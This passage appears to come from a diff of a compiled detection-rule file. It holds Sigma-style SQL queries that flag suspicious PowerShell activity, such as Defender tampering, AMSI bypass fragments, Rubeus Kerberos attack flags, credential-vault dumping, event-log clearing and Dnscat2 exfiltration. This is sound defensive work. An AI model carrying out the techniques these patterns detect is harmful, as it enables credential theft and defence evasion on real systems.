ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%IO.FileStream%' ESCAPE '\\' AND ScriptBlockText LIKE '%\\\\\\\\.\\\\\\*' ESCAPE '\\')" ], - "filename": "posh_ps_susp_service_dacl_modification_set_service.yml" + "filename": "posh_ps_susp_iofilestream.yml" }, { - "title": "Abuse of Service Permissions to Hide Services Via Set-Service - PS", - "id": "953945c5-22fe-4a92-9f8a-a9edc1e522da", + "title": "PowerShell Write-EventLog Usage", + "id": "35f41cd7-c98e-469f-8a02-ec4ba0cc7a7e", "status": 
"experimental", - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", + "description": "Detects usage of the \"Write-EventLog\" cmdlet with 'RawData' flag. The cmdlet can be levreage to write malicious payloads to the EventLog and then retrieve them later for later use", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.defense_evasion" ], "falsepositives": [ - "Rare intended use of hidden services", - "Rare FP could occur due to the non linearity of the ScriptBlockText log" + "Legitimate applications writing events via this cmdlet. Investigate alerts to determine if the action is benign" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%DCLCWPDTSD%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Write-EventLog%' ESCAPE '\\' AND ScriptBlockText LIKE '%-RawData %' ESCAPE '\\')" ], - "filename": "posh_ps_using_set_service_to_hide_services.yml" + "filename": "posh_ps_susp_write_eventlog.yml" }, { - "title": "Powershell Install a DLL in System Directory", - "id": "63bf8794-9917-45bc-88dd-e1b5abc0ecfd", + "title": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell", + "id": "e6cb92b4-b470-4eb8-8a9d-d63e8583aae0", "status": "experimental", - "description": "Uses PowerShell to install/copy a a file into a 
system directory such as \"System32\" or \"SysWOW64\"", - "author": "frack113, Nasreddine Bencherchali", + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1556.002" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Copy-Item %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Destination %' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Windows\\\\System32%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Windows\\\\SysWOW64%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%rundll32.exe%' ESCAPE '\\' AND ScriptBlockText LIKE '%shell32.dll%' ESCAPE '\\' AND ScriptBlockText LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND ScriptBlockText LIKE '%powershell%' ESCAPE '\\')" ], - "filename": "posh_ps_copy_item_system_directory.yml" + "filename": "posh_ps_invoke_obfuscation_via_rundll.yml" }, { - "title": "Windows Firewall Profile Disabled", - "id": "488b44e7-3781-4a71-888d-c95abfacf44d", - "status": "experimental", - "description": "Detects when a user disables the Windows Firewall via a Profile to help evade defense.", - "author": "Austin Songer @austinsonger", + "title": "AD Groups Or Users Enumeration Using PowerShell - ScriptBlock", + "id": "88f0884b-331d-403d-a3a1-b668cf035603", + "status": "test", + "description": "Adversaries may attempt to find domain-level groups and permission settings.\nThe knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this 
information to determine which users have elevated permissions, such as domain administrators.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.004" + "attack.discovery", + "attack.t1069.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-NetFirewallProfile %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Enabled %' ESCAPE '\\' AND ScriptBlockText LIKE '% False%' ESCAPE '\\' AND (ScriptBlockText LIKE '% -All %' ESCAPE '\\' OR ScriptBlockText LIKE '%Public%' ESCAPE '\\' OR ScriptBlockText LIKE '%Domain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Private%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%get-ADPrincipalGroupMembership%' ESCAPE '\\' OR (ScriptBlockText LIKE '%get-aduser%' ESCAPE '\\' AND ScriptBlockText LIKE '%-f %' ESCAPE '\\' AND ScriptBlockText LIKE '%-pr %' ESCAPE '\\' AND ScriptBlockText LIKE '%DoesNotRequirePreAuth%' ESCAPE '\\')))" ], - "filename": "posh_ps_windows_firewall_profile_disabled.yml" + "filename": "posh_ps_susp_ad_group_reco.yml" }, { - "title": "Powershell Sensitive File Discovery", - "id": "7d416556-6502-45b2-9bad-9d2f05f38997", - "status": "experimental", - "description": "Detect adversaries enumerate sensitive files", + "title": "Create Volume Shadow Copy with Powershell", + "id": "afd12fed-b0ec-45c9-a13d-aa86625dac81", + "status": "test", + "description": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1083" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell 
scripts" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%ls%' ESCAPE '\\' OR ScriptBlockText LIKE '%get-childitem%' ESCAPE '\\' OR ScriptBlockText LIKE '%gci%' ESCAPE '\\') AND ScriptBlockText LIKE '%-recurse%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.pass%' ESCAPE '\\' OR ScriptBlockText LIKE '%.kdbx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.kdb%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%).Create(%' ESCAPE '\\' AND ScriptBlockText LIKE '%ClientAccessible%' ESCAPE '\\')" ], - "filename": "posh_ps_sensitive_file_discovery.yml" + "filename": "posh_ps_create_volume_shadow_copy.yml" }, { - "title": "Dump Credentials from Windows Credential Manager With PowerShell", - "id": "99c49d9c-34ea-45f7-84a7-4751ae6b2cbc", - "status": "test", - "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n", - "author": "frack113", + "title": "Tamper Windows Defender - ScriptBlockLogging", + "id": "14c71865-6cd3-44ae-adaa-1db923fae5f2", + "status": "experimental", + "description": "Detects powershell scripts attempting to disable scheduled scanning and other parts of windows defender atp or set default actions to allow.", + "author": "frack113, elhoim, Tim Shelton (fps, alias support)", "tags": [ - "attack.credential_access", - "attack.t1555" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = 
'4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Get-PasswordVaultCredentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CredManCreds%' ESCAPE '\\') OR (ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Windows.Security.Credentials.PasswordVault%' ESCAPE '\\') OR (ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Microsoft.CSharp.CSharpCodeProvider%' ESCAPE '\\' AND ScriptBlockText LIKE '%[System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory())%' ESCAPE '\\' AND ScriptBlockText LIKE '%Collections.ArrayList%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.CodeDom.Compiler.CompilerParameters%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen 
$true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND ScriptBlockText LIKE '%Allow%' ESCAPE '\\' AND (ScriptBlockText LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (ScriptBlockText LIKE '%ltdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%mtdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%htdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%stdefac %' ESCAPE '\\'))))" ], - "filename": "posh_ps_dump_password_windows_credential_manager.yml" + "filename": "posh_ps_tamper_defender.yml" }, { - "title": "Powershell Directory Enumeration", - "id": "162e69a7-7981-4344-84a9-0f1c9a217a52", - "status": "test", - "description": "Detects technique used by MAZE ransomware to enumerate directories using Powershell", - "author": "frack113", + "title": "Suspicious Eventlog Clear", + "id": "0f017df3-8f5a-414f-ad6b-24aff1128278", + "status": "experimental", + "description": "Detects usage of known powershell cmdlets such as \"Clear-EventLog\" to clear the windows event logs", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1083" + "attack.defense_evasion", + "attack.t1070.001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Rare need to clear logs before doing something. Sometimes used by installers or cleaner scripts. 
The script should be investigated to determine if it's legitimate" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%foreach%' ESCAPE '\\' AND ScriptBlockText LIKE '%Get-ChildItem%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Path %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ErrorAction %' ESCAPE '\\' AND ScriptBlockText LIKE '%SilentlyContinue%' ESCAPE '\\' AND ScriptBlockText LIKE '%Out-File %' ESCAPE '\\' AND ScriptBlockText LIKE '%-append%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Clear-EventLog %' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-EventLog %' ESCAPE '\\' OR ScriptBlockText LIKE '%Limit-EventLog %' ESCAPE '\\' OR ScriptBlockText LIKE '%Clear-WinEvent %' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_directory_enum.yml" + "filename": "posh_ps_susp_clear_eventlog.yml" }, { - "title": "Password Policy Discovery With Get-AdDefaultDomainPasswordPolicy", - "id": "bbb9495b-58fc-4016-b9df-9a3a1b67ca82", + "title": "Suspicious Invoke-Item From Mount-DiskImage", + "id": "902cedee-0398-4e3a-8183-6f3a89773a96", "status": "test", - "description": "Detetcts PowerShell activity in which Get-Addefaultdomainpasswordpolicy is used to get the default password policy for an Active Directory domain.", + "description": "Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1201" + "attack.defense_evasion", + "attack.t1553.005" ], "falsepositives": [ "Legitimate PowerShell scripts" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 
'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-AdDefaultDomainPasswordPolicy%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Mount-DiskImage %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ImagePath %' ESCAPE '\\' AND ScriptBlockText LIKE '%Get-Volume%' ESCAPE '\\' AND ScriptBlockText LIKE '%.DriveLetter%' ESCAPE '\\' AND ScriptBlockText LIKE '%invoke-item %' ESCAPE '\\' AND ScriptBlockText LIKE '%):\\\\%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_get_addefaultdomainpasswordpolicy.yml" + "filename": "posh_ps_run_from_mount_diskimage.yml" }, { - "title": "Suspicious PowerShell WindowStyle Option", - "id": "313fbb0a-a341-4682-848d-6d6f8c4fab7c", + "title": "Manipulation of User Computer or Group Security Principals Across AD", + "id": "b29a93fb-087c-4b5b-a84d-ee3309e69d08", "status": "test", - "description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users.\nIn some cases, windows that would typically be displayed when an application carries out an operation can be hidden\n", - "author": "frack113, Tim Shelton (fp AWS)", + "description": "Adversaries may create a domain account to maintain access to victim systems.\nDomain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain..\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1564.003" + "attack.persistence", + "attack.t1136.002" ], "falsepositives": [ - "Unknown" + "Legitimate administrative script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%powershell%' ESCAPE '\\' AND ScriptBlockText LIKE '%WindowStyle%' ESCAPE '\\' AND ScriptBlockText LIKE 
'%Hidden%' ESCAPE '\\') AND NOT (ScriptBlockText LIKE '%:\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\%' ESCAPE '\\' AND ScriptBlockText LIKE '%$PSScriptRoot\\\\Module\\\\WorkspaceScriptModule\\\\WorkspaceScriptModule%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.DirectoryServices.AccountManagement%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_windowstyle.yml" + "filename": "posh_ps_directoryservices_accountmanagement.yml" }, { - "title": "Get-ADUser Enumeration Using UserAccountControl Flags", - "id": "96c982fe-3d08-4df4-bed2-eb14e02f21c8", + "title": "Dnscat Execution", + "id": "a6d67db4-6220-436d-8afc-f3842fe05d43", "status": "test", - "description": "Detects AS-REP roasting is an attack that is often-overlooked. It is not very common as you have to explicitly set accounts that do not require pre-authentication.", - "author": "frack113", + "description": "Dnscat exfiltration tool execution", + "author": "Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.discovery", - "attack.t1033" + "attack.exfiltration", + "attack.t1048", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Legitimate usage of PowerShell Dnscat2 — DNS Exfiltration tool (unlikely)" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADUser%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Filter%' ESCAPE '\\' AND ScriptBlockText LIKE '%useraccountcontrol%' ESCAPE '\\' AND ScriptBlockText LIKE '%-band%' ESCAPE '\\' AND ScriptBlockText LIKE '%4194304%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText 
LIKE '%Start-Dnscat2%' ESCAPE '\\')" ], - "filename": "posh_ps_as_rep_roasting.yml" + "filename": "posh_ps_dnscat_execution.yml" }, { - "title": "Powershell Detect Virtualization Environment", - "id": "d93129cd-1ee0-479f-bc03-ca6f129882e3", + "title": "Remove Account From Domain Admin Group", + "id": "48a45d45-8112-416b-8a67-46e03a4b2107", "status": "test", - "description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments.\nThis may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox\n", - "author": "frack113, Duc.Le-GTSC", + "description": "Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users.\nAccounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1497.001" + "attack.impact", + "attack.t1531" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi%' ESCAPE '\\') AND (ScriptBlockText LIKE '%MSAcpi\\_ThermalZoneTemperature%' ESCAPE '\\' OR ScriptBlockText LIKE '%Win32\\_ComputerSystem%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-ADGroupMember%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Identity %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Members %' ESCAPE '\\')" ], - "filename": "posh_ps_detect_vm_env.yml" + "filename": "posh_ps_susp_remove_adgroupmember.yml" }, { - "title": "Potential PowerShell Obfuscation Using Alias Cmdlets", - "id": 
"96cd126d-f970-49c4-848a-da3a09f55c55", + "title": "Suspicious GetTypeFromCLSID ShellExecute", + "id": "8bc063d5-3a3a-4f01-a140-bc15e55e8437", "status": "experimental", - "description": "Detects Set-Alias or New-Alias cmdlet usage. Which can be use as a mean to obfuscate PowerShell scripts", + "description": "Detects suspicious Powershell code that execute COM Objects", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1027", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Set-Alias %' ESCAPE '\\' OR ScriptBlockText LIKE '%New-Alias %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%::GetTypeFromCLSID(%' ESCAPE '\\' AND ScriptBlockText LIKE '%.ShellExecute(%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_set_alias.yml" + "filename": "posh_ps_susp_gettypefromclsid.yml" }, { - "title": "AMSI Bypass Pattern Assembly GetType", - "id": "e0d6c087-2d1c-47fd-8799-3904103c5a98", + "title": "Active Directory Group Enumeration With Get-AdGroup", + "id": "8c3a6607-b7dc-4f0d-a646-ef38c00b76ee", "status": "experimental", - "description": "Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of the \"Get-AdGroup\" cmdlet to enumerate Groups within Active Directory", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.execution" + "attack.discovery", + "attack.t1069.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + 
"level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND ScriptBlockText LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND ScriptBlockText LIKE '%NonPublic,Static%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-AdGroup %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Filter%' ESCAPE '\\')" ], - "filename": "posh_ps_amsi_bypass_pattern_nov22.yml" + "filename": "posh_ps_get_adgroup.yml" }, { - "title": "Suspicious Get-WmiObject", - "id": "0332a266-b584-47b4-933d-a00b103e1b37", + "title": "Suspicious X509Enrollment - Ps Script", + "id": "504d63cb-0dba-4d02-8531-e72981aace2c", "status": "experimental", - "description": "The infrastructure for management data and operations that enables local and remote management of Windows personal computers and servers", + "description": "Detect use of X509Enrollment", "author": "frack113", - "tags": [ - "attack.persistence", - "attack.t1546" - ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Legitimate administrative script" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi%' ESCAPE '\\') AND NOT ((Path LIKE '%\\\\CL\\_Utility.ps1' ESCAPE '\\' AND ScriptBlockText LIKE '%function Get-FreeSpace%' ESCAPE '\\' AND ScriptBlockText LIKE '%SELECT % FROM Win32\\_LogicalDisk WHERE MediaType=12%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%X509Enrollment.CBinaryConverter%' ESCAPE 
'\\' OR ScriptBlockText LIKE '%884e2002-217d-11da-b2a4-000e7bbb2b09%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_gwmi.yml" + "filename": "posh_ps_x509enrollment.yml" }, { - "title": "Remove Account From Domain Admin Group", - "id": "48a45d45-8112-416b-8a67-46e03a4b2107", - "status": "test", - "description": "Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users.\nAccounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.\n", - "author": "frack113", + "title": "HackTool - Rubeus Execution - ScriptBlock", + "id": "3245cd30-e015-40ff-a31d-5cadd5f377ec", + "status": "experimental", + "description": "Detects the execution of the hacktool Rubeus using specific command line flags", + "author": "Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1531" + "attack.credential_access", + "attack.t1003", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-ADGroupMember%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Identity %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Members %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%asreproast %' ESCAPE '\\' OR ScriptBlockText LIKE '%dump /service:krbtgt %' ESCAPE '\\' OR ScriptBlockText LIKE '%dump /luid:0x%' ESCAPE '\\' OR ScriptBlockText LIKE '%kerberoast %' ESCAPE '\\' OR ScriptBlockText LIKE '%createnetonly /program:%' ESCAPE '\\' OR ScriptBlockText LIKE '%ptt /ticket:%' ESCAPE '\\' OR ScriptBlockText LIKE '%/impersonateuser:%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%renew /ticket:%' ESCAPE '\\' OR ScriptBlockText LIKE '%asktgt /user:%' ESCAPE '\\' OR ScriptBlockText LIKE '%harvest /interval:%' ESCAPE '\\' OR ScriptBlockText LIKE '%s4u /user:%' ESCAPE '\\' OR ScriptBlockText LIKE '%s4u /ticket:%' ESCAPE '\\' OR ScriptBlockText LIKE '%hash /password:%' ESCAPE '\\' OR ScriptBlockText LIKE '%golden /aes256:%' ESCAPE '\\' OR ScriptBlockText LIKE '%silver /user:%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_remove_adgroupmember.yml" + "filename": "posh_ps_hktl_rubeus.yml" }, { - "title": "Suspicious PowerShell Mailbox Export to Share - PS", - "id": "4a241dea-235b-4a7e-8d76-50d817b146c4", + "title": "Windows Defender Exclusions Added - PowerShell", + "id": "c1344fa2-323b-4d2e-9176-84b4d4821c88", "status": "experimental", - "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects modifications to the Windows Defender configuration settings using PowerShell to add exclusions", + "author": "Tim Rauch", "tags": [ - "attack.exfiltration" + "attack.defense_evasion", + "attack.t1562", + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Mailbox %' ESCAPE '\\' AND ScriptBlockText LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '% -ExclusionPath %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ExclusionExtension %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ExclusionProcess %' 
ESCAPE '\\' OR ScriptBlockText LIKE '% -ExclusionIpAddress %' ESCAPE '\\') AND (ScriptBlockText LIKE '%Add-MpPreference %' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MpPreference %' ESCAPE '\\'))" ], - "filename": "posh_ps_mailboxexport_share.yml" + "filename": "posh_ps_win_defender_exclusions_added.yml" }, { - "title": "Execution via CL_Invocation.ps1 - Powershell", - "id": "4cd29327-685a-460e-9dac-c3ab96e549dc", - "status": "experimental", - "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", - "author": "oscd.community, Natalia Shornikova", + "title": "Malicious PowerView PowerShell Commandlets", + "id": "dcd74b95-3f36-4ed9-9598-0490951643aa", + "status": "test", + "description": "Detects Commandlet names from PowerView of PowerSploit exploitation framework.", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1216" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Should not be any as administrators do not use this tool" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%SyncInvoke%' 